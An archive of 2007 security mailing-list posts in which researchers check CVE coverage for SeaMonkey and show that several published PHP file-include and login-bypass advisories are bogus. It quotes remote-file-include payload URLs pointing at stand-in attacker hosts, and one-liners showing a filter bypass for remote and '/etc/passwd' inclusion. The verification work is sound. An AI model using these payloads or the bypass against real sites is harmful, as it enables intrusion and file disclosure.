<200707301600.l6UG0ubM017048@faron.mitre.org> References: <200707301600.l6UG0ubM017048@faron.mitre.org> Message-ID: <814b9d50707301052q3e1cf0b0oa751e32e77cbb1a8@mail.gmail.com> Hey Steve, Here is the information I have. site: http://www.prozilla.com/ product: http://www.prozilla.com/item.php?item=65 demo: http://www.turnkeyzone.com/demos/adultdir/ /str0ke On 7/30/07, Steven M. Christey wrote: > > Refs: > > http://www.milw0rm.com/exploits/4238 > FrSIRT/ADV-2007-2695 > > One of our analysts observed: > > There is a substantial inconsistency in how the researcher specifies > the product; it is not known whether the actual product is > site-specific. In particular, the researcher says > photo.sourceforge.net, which points to a SourceForge project named > Photo Collection. There is only one version of Photo Collection > available at SourceForge (1.3.1, from 20000803). This version does > not have a directory.php or any use of cat_id. Also, the download > has no mention of "Adult." The researcher provides a DORK field > apparently intended for locating installations of the product, but > nothing relevant was found as of 20070730. It is conceivable that > the product in question is a distributable variant of the > SourceForge Photo Collection product, with additional components > such as directory.php. > > > Anybody have more info? > > - Steve > From coley at mitre.org Mon Jul 30 21:14:17 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 17:14:17 -0400 (EDT) Subject: [VIM] SeaMonkey 1.1.3 coverage Message-ID: <200707302114.l6ULEHwx022231@faron.mitre.org> as prompted by this: ftp://ftp.slackware.com/pub/slackware/slackware-12.0/ChangeLog.txt SECUNIA:26205 The changelog says "Upgraded to seamonkey-1.1.3. This is presumably a security update, but the details on the net have been sparse. So far nothing has appeared at the usual URL" Josh Bressers of Red Hat, who works closely on the Mozilla product line, has confirmed to me that the issues for this release are the same as those mentioned in RHSA-2007-0722: http://rhn.redhat.com/errata/RHSA-2007-0722.html Specifically: CVE-2007-3089 CVE-2007-3656 CVE-2007-3734 CVE-2007-3735 CVE-2007-3736 CVE-2007-3737 CVE-2007-3738 The associated Mozilla advisories do *not* mention SeaMonkey at all, and the Mozilla security page includes a pointer to a 1.1.3 list of vulns, but it's not up yet. - Steve From theall at tenablesecurity.com Mon Jul 30 23:39:42 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 19:39:42 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <200707302114.l6ULEHwx022231@faron.mitre.org> References: <200707302114.l6ULEHwx022231@faron.mitre.org> Message-ID: <46AE76BE.60505@tenablesecurity.com> On 07/30/07 17:14, Steven M. Christey wrote: > The associated Mozilla advisories do *not* mention SeaMonkey at all, Actually, they do -- http://www.mozilla.org/security/announce/2007/mfsa2007-18.html lists Seamonkey in the list of products affected by the issues. That advisory maps to CVE-2007-3734 and CVE-2007-3735 and corresponds to a number of bug ids. I tried looking at 10+ of those bug ids; anonymous access is prohibited for all but 344300, which doesn't mention Seamonkey per se. > and the Mozilla security page includes a pointer to a 1.1.3 list of > vulns, but it's not up yet. Yeah, I noticed that last week. Odd. Still, Seamoney 1.1.3 is out and the news report at http://www.mozilla.org/projects/seamonkey/news.html#2007-07-19 claims it "closes several security vulnerabilities". George -- theall at tenablesecurity.com From theall at tenablesecurity.com Tue Jul 31 00:19:37 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 20:19:37 -0400 Subject: [VIM] WTF: BellaBiblio Admin Login Bypass Message-ID: <46AE8019.5030907@tenablesecurity.com> I must be losing it... ilker kandemir posted a recent advisory to SecurityFocus about a way to bypass authentication in BellaBiblio: http://www.securityfocus.com/archive/1/475103/30/0/threaded quotes the following code snippet: if (isset($_COOKIE['bellabiblio'])) { if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) { if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = ""; and then says you just need to set the 'bellabiblio' cookie to 'administrator' when calling the admin.php to bypass authentication. Hello? md5() returns a 32-byte hash, so how in the world can that ever equal 'administrator'??? So unless I'm having a really bad start to the week, it looks like Bugtraq 25140 is bogus. George -- theall at tenablesecurity.com From coley at linus.mitre.org Tue Jul 31 00:23:15 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 20:23:15 -0400 (EDT) Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <46AE76BE.60505@tenablesecurity.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> Message-ID: On Mon, 30 Jul 2007, George A. Theall wrote: > > On 07/30/07 17:14, Steven M. Christey wrote: > > The associated Mozilla advisories do *not* mention SeaMonkey at all, > > Actually, they do -- > http://www.mozilla.org/security/announce/2007/mfsa2007-18.html lists > Seamonkey in the list of products affected by the issues. Naturally, you had to point out a counter-example. I must admit only checking about 3 Mozilla advisories. As a counter-counter-example ;-) http://www.mozilla.org/security/announce/2007/mfsa2007-19.html is associated with CVE-2007-3736, which is in the Red Hat advisory but doesn't mention SeaMonkey. Similar for 2007-25, 24, 21, and 20. So I guess we have some more inconsistencies on top of everything else. - Steve From theall at tenablesecurity.com Tue Jul 31 00:26:43 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 20:26:43 -0400 Subject: [VIM] WTF: Phorm v3.0 Remote File Upload Vulnerability Message-ID: <46AE81C3.3040100@tenablesecurity.com> Another questionable advisory from ilker kandemir: Phorm v3.0 Remote File Upload Vulnerability lists as an exploit: http://[site]/[phorm_path]/lib/fileupload.php Only trouble is, version 3.0 is distributed with a .htaccess file in lib/ that prevents direct access to files in that directory. And the first line of code in the file reads: if (isset($PHP_SELF) && !eregi("^phorm.php", basename($PHP_SELF))) return; While I realize there are ways around this check, the PoC as written in the advisory won't do that. George -- theall at tenablesecurity.com From coley at linus.mitre.org Tue Jul 31 00:32:37 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 20:32:37 -0400 (EDT) Subject: [VIM] WTF: BellaBiblio Admin Login Bypass In-Reply-To: <46AE8019.5030907@tenablesecurity.com> References: <46AE8019.5030907@tenablesecurity.com> Message-ID: I just downloaded the source code and it's as you described. Looks wrong to me, too - $admin_name etc. are hard-coded in config.php, which is included just before this code. Not to mention that "administrator" isn't a valid md5 result :) - Steve From theall at tenablesecurity.com Tue Jul 31 00:44:20 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 20:44:20 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> Message-ID: <46AE85E4.6030001@tenablesecurity.com> On 07/30/07 20:23, Steven M. Christey wrote: > Naturally, you had to point out a counter-example. I must admit only > checking about 3 Mozilla advisories. Well, I did check them all last week when I wrote the recent Nessus plugin for it. And this was the only one of the recent bunch that mentioned Seamonkey, at least when I checked. > So I guess we have some more inconsistencies on top of everything else. Are you talking about inconsistencies in Redhat's advisory? Their bug report (248518) seems to lump Firefox / Thunderbird / Seamonkey together. Notice that RHSA-2007-0723 (covering Thunderbird) lists the same set of CVEs, except for CVE-2007-3656, as RHSA-2007-0722 (covering Seamonkey) even though if you cross-reference the advisories, you'll see that only CVE-2007-3734 and CVE-2007-3735 apply. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Tue Jul 31 00:45:50 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 20:45:50 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <46AE85E4.6030001@tenablesecurity.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> <46AE85E4.6030001@tenablesecurity.com> Message-ID: <46AE863E.1040504@tenablesecurity.com> On 07/30/07 20:44, George A. Theall wrote: > Are you talking about inconsistencies in Redhat's advisory? Their bug > report (248518) seems to lump Firefox / Thunderbird / Seamonkey > together. Notice that RHSA-2007-0723 (covering Thunderbird) lists the > same set of CVEs, except for CVE-2007-3656, as RHSA-2007-0722 (covering > Seamonkey) even though if you cross-reference the advisories, you'll see > that only CVE-2007-3734 and CVE-2007-3735 apply. ^---- apply to Thunderbird. George -- theall at tenablesecurity.com From coley at mitre.org Tue Jul 31 00:59:37 2007 From: coley at mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 20:59:37 -0400 (EDT) Subject: [VIM] true: Madoa RFI Message-ID: <200707310059.l6V0xbk4025295@faron.mitre.org> I investigated this because ilker kandemir is the same researcher who reported the apparently-incorrect BellaBiblio issue. However, this one is clearly true. Both index.php and vote.php contain this code in the first line: require ($Madoa . "config.php"); admin.php has a preceding require of functions/general.php, but that's just (surprise) function definitions. - Steve From bressers at redhat.com Tue Jul 31 01:12:04 2007 From: bressers at redhat.com (Josh Bressers) Date: Mon, 30 Jul 2007 21:12:04 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <46AE85E4.6030001@tenablesecurity.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> <46AE85E4.6030001@tenablesecurity.com> Message-ID: <23197.1185844324@devserv.devel.redhat.com> > > > So I guess we have some more inconsistencies on top of everything else. > > Are you talking about inconsistencies in Redhat's advisory? Their bug > report (248518) seems to lump Firefox / Thunderbird / Seamonkey > together. Notice that RHSA-2007-0723 (covering Thunderbird) lists the > same set of CVEs, except for CVE-2007-3656, as RHSA-2007-0722 (covering > Seamonkey) even though if you cross-reference the advisories, you'll see > that only CVE-2007-3734 and CVE-2007-3735 apply. > What inconsistencies do you speak of? I admit it's possible there are errors, but for reasons I won't get into, I trust the current Red Hat advisories more than the upstream Mozilla advisories at this time. I fair to understand why you say only CVE-2007-3734 and CVE-2007-2735 apply to Thunderbird. Where did this information come from? -- JB From coley at linus.mitre.org Tue Jul 31 01:21:30 2007 From: coley at linus.mitre.org (Steven M. Christey) Date: Mon, 30 Jul 2007 21:21:30 -0400 (EDT) Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <46AE85E4.6030001@tenablesecurity.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> <46AE85E4.6030001@tenablesecurity.com> Message-ID: On Mon, 30 Jul 2007, George A. Theall wrote: > On 07/30/07 20:23, Steven M. Christey wrote: > > > So I guess we have some more inconsistencies on top of everything else. > > Are you talking about inconsistencies in Redhat's advisory? Sorry, I meant that some Mozilla advisories mentioned SeaMonkey and others did not, even though SeaMonkey is apparently affected. At the moment, I'm treating the Red Hat advisories as best available information. - Steve From theall at tenablesecurity.com Tue Jul 31 01:42:30 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 21:42:30 -0400 Subject: [VIM] SeaMonkey 1.1.3 coverage In-Reply-To: <23197.1185844324@devserv.devel.redhat.com> References: <200707302114.l6ULEHwx022231@faron.mitre.org> <46AE76BE.60505@tenablesecurity.com> <46AE85E4.6030001@tenablesecurity.com> <23197.1185844324@devserv.devel.redhat.com> Message-ID: <46AE9386.8050604@tenablesecurity.com> On 07/30/07 21:12, Josh Bressers wrote: > What inconsistencies do you speak of? I was only asking for clarification from Steve there. > I admit it's possible there are > errors, but for reasons I won't get into, I trust the current Red Hat > advisories more than the upstream Mozilla advisories at this time. > I fair to understand why you say only CVE-2007-3734 and CVE-2007-2735 apply > to Thunderbird. Where did this information come from? It's from looking at MFSA 2007-18 - MFSA 2007-25: only MFSA 2007-18 and MFSA 2007-23 list Thunderbird as affected. [MFSA 2007-23 does cross-reference CVE-2007-3670, but that CVE entry concerns IE.] But searching for mention of Thunderbird in the descriptions of the CVEs listed in RHSA-2007-0723 leads me to the same conclusion. I unfortunately don't have access to most of the underlying bug reports on Mozilla.org, so it's quite possible I'm off-base here. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Tue Jul 31 02:06:16 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 22:06:16 -0400 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability Message-ID: <46AE9918.7060409@tenablesecurity.com> Another advisory from ilker Kandemir: http://archives.neohapsis.com/archives/bugtraq/2007-07/0365.html Sample exploit: check_entry.php?dir_abs_src=http://attacker.php? Actual code from 2006-06-24_v10: ---- snip, snip, snip ---- function rig_check_src_file($name) { ... // disable auto-globals from CGI params -- RM 20060624 - v1.0 ini_set("register_globals", "0"); // complain if that didn't work if (ini_get("register_globals") == 1) { echo "

RIG Security Error

"; ... exit; } ... $name = str_replace("..", ".", str_replace("://", "", $name)); ... return $name; } ... require_once(rig_check_src_file($dir_abs_src . "entry_point.php")); ---- snip, snip, snip ---- By the way, there is no executable PHP code before the function definition. I don't think any version of PHP allows for changing register_globals via ini_set() -- see -- which is probably why the author checks whether it is set and exits if so. But regardless, the str_replace() later on in rig_check_src_file() would certainly void the possibility of a remote file include attack. George -- theall at tenablesecurity.com From theall at tenablesecurity.com Tue Jul 31 02:22:55 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Mon, 30 Jul 2007 22:22:55 -0400 Subject: [VIM] WTF: phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability Message-ID: <46AE9CFF.9050600@tenablesecurity.com> Yet another advisory from ilker Kandemir: http://archives.neohapsis.com/archives/bugtraq/2007-07/0366.html Sample exploit: index.php?PN_PathPrefix=http://attacker.txt? Actual code from index.php from phpWebFileManager v0.5: ---- snip, snip, snip ---- $fm_init_file = dirname(__FILE__) . (strlen(dirname(__FILE__)) > 0 ? '/' : '') . 'init.inc.php'; if (! @file_exists($fm_init_file)) { exit; } require_once $fm_init_file; /* * Libraries function inclusion */ require_once $PN_PathPrefix . 'functions.inc.php'; ---- snip, snip, snip ---- So index.php first determine's the location of its init.inc.php file and then requires it. Actual code from init.inc.php from phpWebFileManager v0.5: ---- snip, snip, snip ---- $ModName = null; $PN_PathPrefix = ''; if (defined('LOADED_AS_MODULE')) { $ModName = basename(dirname(__FILE__)); $PN_PathPrefix = "modules/$ModName/"; } else { $PN_PathPrefix = dirname(__FILE__); $PN_PathPrefix .= '/'; } ---- snip, snip, snip ---- init.inc.php includes several other files, but I didn't see any that might allow an attacker to override $PN_PathPrefix via some sort of register_globals emulation. George -- theall at tenablesecurity.com From str0ke at milw0rm.com Tue Jul 31 11:18:24 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 31 Jul 2007 06:18:24 -0500 Subject: [VIM] WTF: BellaBiblio Admin Login Bypass In-Reply-To: References: <46AE8019.5030907@tenablesecurity.com> Message-ID: <814b9d50707310418n7f9d15c4i20e651d0e6bffcef@mail.gmail.com> He's been sending them into milw0rm for the past week, he knows they don't work. /str0ke On 7/30/07, Steven M. Christey wrote: > > I just downloaded the source code and it's as you described. Looks wrong > to me, too - $admin_name etc. are hard-coded in config.php, which is > included just before this code. Not to mention that "administrator" isn't > a valid md5 result :) > > - Steve > From ascii at katamail.com Tue Jul 31 15:09:41 2007 From: ascii at katamail.com (ascii) Date: Tue, 31 Jul 2007 17:09:41 +0200 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability In-Reply-To: <46AE9918.7060409@tenablesecurity.com> References: <46AE9918.7060409@tenablesecurity.com> Message-ID: <46AF50B5.30709@katamail.com> George A. Theall wrote: > But regardless, the str_replace() later on in rig_check_src_file() > would certainly void the possibility of a remote file include attack. I'm not saying that the product is vulnerable but that this statement is completely flawed, rig_check_src_file() is mostly useless (assumption taken from the George's code snippet, I haven't downloaded the original script). function rig_check_src_file($name) { ... $name = str_replace("..", ".", str_replace("://", "", $name)); ... return $name; } This alone permits both local and remote file inclusions: Example a) Remote file inclusion php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".", str_replace("://", "", $name)); echo $name."\n"; require_once($name);' http://www.tin.it/ Warning: require_once(): URL file-access is disabled in the server configuration in Command line code on line 1 Warning: require_once(http://www.tin.it/): failed to open stream: no suitable wrapper could be found in Command line code on line 1 Fatal error: require_once(): Failed opening required 'http://www.tin.it/' (include_path='.:/usr/share/php5:/usr/share/php') in Command line code on line 1 Example b) Local file inclusion php -r '$name=".../.../.../etc/passwd"; $name = str_replace("..", ".", str_replace("://", "", $name)); echo $name."\n"; require_once($name);' ../../../etc/passwd Warning: require_once(../../../etc/passwd): failed to open stream: No such file or directory in Command line code on line 1 Fatal error: require_once(): Failed opening required '../../../etc/passwd' (include_path='.:/usr/share/php5:/usr/share/php') in Command line code on line 1 Best regards, Francesco `ascii` Ongaro http://www.ush.it/ From str0ke at milw0rm.com Tue Jul 31 13:19:55 2007 From: str0ke at milw0rm.com (str0ke) Date: Tue, 31 Jul 2007 08:19:55 -0500 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability In-Reply-To: <46AF50B5.30709@katamail.com> References: <46AE9918.7060409@tenablesecurity.com> <46AF50B5.30709@katamail.com> Message-ID: <814b9d50707310619u3992262fv222df3b829ee5f6@mail.gmail.com> // disable auto-globals from CGI params -- RM 20060624 - v1.0 ini_set("register_globals", "0"); // complain if that didn't work if (ini_get("register_globals") == 1) { echo "

RIG Security Error

"; ... exit; } With register globals = off he wouldn't be able to initialize the variable anyways correct? /str0ke On 7/31/07, ascii wrote: > George A. Theall wrote: > > But regardless, the str_replace() later on in rig_check_src_file() > > would certainly void the possibility of a remote file include attack. > > I'm not saying that the product is vulnerable but that this statement > is completely flawed, rig_check_src_file() is mostly useless (assumption > taken from the George's code snippet, I haven't downloaded the original > script). > > function rig_check_src_file($name) { > ... > $name = str_replace("..", ".", str_replace("://", "", $name)); > ... > return $name; > } > > This alone permits both local and remote file inclusions: > > Example a) Remote file inclusion > > php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".", > str_replace("://", "", $name)); echo $name."\n"; require_once($name);' > http://www.tin.it/ > > Warning: require_once(): URL file-access is disabled in the server > configuration in Command line code on line 1 > > Warning: require_once(http://www.tin.it/): failed to open stream: no > suitable wrapper could be found in Command line code on line 1 > > Fatal error: require_once(): Failed opening required > 'http://www.tin.it/' (include_path='.:/usr/share/php5:/usr/share/php') > in Command line code on line 1 > > Example b) Local file inclusion > > php -r '$name=".../.../.../etc/passwd"; $name = str_replace("..", ".", > str_replace("://", "", $name)); echo $name."\n"; require_once($name);' > ../../../etc/passwd > > Warning: require_once(../../../etc/passwd): failed to open stream: No > such file or directory in Command line code on line 1 > > Fatal error: require_once(): Failed opening required > '../../../etc/passwd' (include_path='.:/usr/share/php5:/usr/share/php') > in Command line code on line 1 > > Best regards, > Francesco `ascii` Ongaro > http://www.ush.it/ > > > > From theall at tenablesecurity.com Tue Jul 31 13:26:39 2007 From: theall at tenablesecurity.com (George A. Theall) Date: Tue, 31 Jul 2007 09:26:39 -0400 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability In-Reply-To: <46AF50B5.30709@katamail.com> References: <46AE9918.7060409@tenablesecurity.com> <46AF50B5.30709@katamail.com> Message-ID: <46AF388F.4040409@tenablesecurity.com> On 07/31/07 11:09, ascii wrote: > George A. Theall wrote: >> But regardless, the str_replace() later on in rig_check_src_file() >> would certainly void the possibility of a remote file include attack. > > I'm not saying that the product is vulnerable but that this statement > is completely flawed, ... > php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".", > str_replace("://", "", $name)); echo $name."\n"; require_once($name);' > http://www.tin.it/ You're right, of course. But along with the register_globals check it does prevent the example exploit from working. George -- theall at tenablesecurity.com From ascii at katamail.com Tue Jul 31 15:43:41 2007 From: ascii at katamail.com (ascii) Date: Tue, 31 Jul 2007 17:43:41 +0200 Subject: [VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability In-Reply-To: <814b9d50707310619u3992262fv222df3b829ee5f6@mail.gmail.com> References: <46AE9918.7060409@tenablesecurity.com> <46AF50B5.30709@katamail.com> <814b9d50707310619u3992262fv222df3b829ee5f6@mail.gmail.com> Message-ID: <46AF58AD.9000105@katamail.com> str0ke wrote: > With register globals = off he wouldn't be able to initialize the > variable anyways correct? Yes, the advisory is fake. (I was just pointing out that the exploit blocker was not the str_replace()) Best regards, Francesco `ascii` Ongaro http://www.ush.it/